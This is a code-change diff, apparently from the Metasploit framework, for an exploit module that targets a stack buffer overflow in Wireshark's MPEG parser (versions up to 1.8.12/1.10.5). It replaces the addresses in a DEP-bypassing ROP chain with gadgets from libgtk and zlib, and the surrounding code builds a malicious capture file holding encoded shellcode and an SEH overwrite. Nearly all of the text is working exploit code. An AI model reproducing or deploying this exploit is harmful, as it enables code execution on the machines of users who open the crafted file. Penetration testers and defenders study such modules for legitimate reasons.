ROP chain changed

Author: jholgui

modules/exploits/windows/misc/wireshark_mpeg_overflow.rb

@@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow (remote) PoC',
+      'Name'           => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow',
       'Description'    => %q{
           This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5
           by generating an malicious file.)
@@ -48,7 +48,7 @@ def initialize(info = {})
           [ 'WinXP SP3 Spanish (bypass DEP)',
             {
               'OffSet' => 70692,
-              'Ret'    => 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module 
+              'Ret'    => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16) 
               'jmpesp' => 0x68e2bfb9,
             }
           ],
@@ -66,28 +66,29 @@ def initialize(info = {})
   def junk
     return rand_text(4).unpack("L")[0].to_i
   end
+
   def create_rop_chain()
 
     # rop chain generated with mona.py - www.corelan.be
     rop_gadgets = 
     [
-      0x78b41ccb,  # POP EAX # RETN [MSVCR100.dll] 
+      0x61863c2a,  # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
       0x62d9027c,  # ptr to &VirtualProtect() [IAT libcares-2.dll]
-      0x61970969,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll] 
-      0x68605980,  # XCHG EAX,ESI # RETN [libglib-2.0-0.dll] 
-      0x64f94ba1,  # POP EBP # RETN [libfontconfig-1.dll] 
-      0x63cd04f1,  # & push esp # ret  [liblzma-5.dll]
-      0x6d4c331b,  # POP EBX # RETN [libpangocairo-1.0-0.dll] 
+      0x61970969,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 
+      0x61988cf6,  # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 
+      0x619c0a2a,  # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
+      0x61841e98,  # & push esp # ret  [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
+      0x6191d11a,  # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
       0x00000201,  # 0x00000201-> ebx
-      0x78aa3bfb,  # POP EDX # RETN [MSVCR100.dll] 
+      0x5a4c1414,  # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0] 
       0x00000040,  # 0x00000040-> edx
-      0x78b29eda,  # POP ECX # RETN [MSVCR100.dll] 
+      0x6197660f,  # POP ECX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
       0x668242b9,  # &Writable location [libgnutls-26.dll]
-      0x70f67579,  # POP EDI # RETN [libxml2-2.dll] 
+      0x6199b8a5,  # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0
       0x63a528c2,  # RETN (ROP NOP) [libgobject-2.0-0.dll]
-      0x6d5f8297,  # POP EAX # RETN [libgio-2.0-0.dll] 
+      0x61863c2a,  # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 
       0x90909090,  # nop
-      0x6536979d,  # PUSHAD # RETN [libpixman-1-0.dll] 
+      0x6199652d,  # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 
     ].flatten.pack("V*")
 
     return rop_gadgets
@@ -98,14 +99,14 @@ def exploit
 
     print_status("Creating '#{datastore['FILENAME']}' file ...")
     magic_header = "\xff\xfb"      							# mpeg magic_number
-    packet =   pattern_create(892)
+    packet = pattern_create(892)
     ropchain = create_rop_chain
     packet << ropchain
     packet << payload.encoded      							# Shellcode
     packet << pattern_create(target['OffSet'] - 892 - ropchain.length - payload.encoded.length)
     # SEH pointers overwrite (nseh & seh) 
-    packet << "\x90\x90\x90\x90" # nseh
-    # 0xff is badchar then we can't make a jump back with jmp $-2000
+    packet << make_nops(4) # nseh
+    # \0xff is a badchar then we can't make a jump back with jmp $-2000
     # After nseh and seh we haven't space, then we have to jump to another location.
     # 0x6b805955 :  # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [libjpeg-8.dll] **   |   {PAGE_EXECUTE_REA
     packet << "\x55\x59\x80\x6b" # seh -> ADD ESP,offset # RETN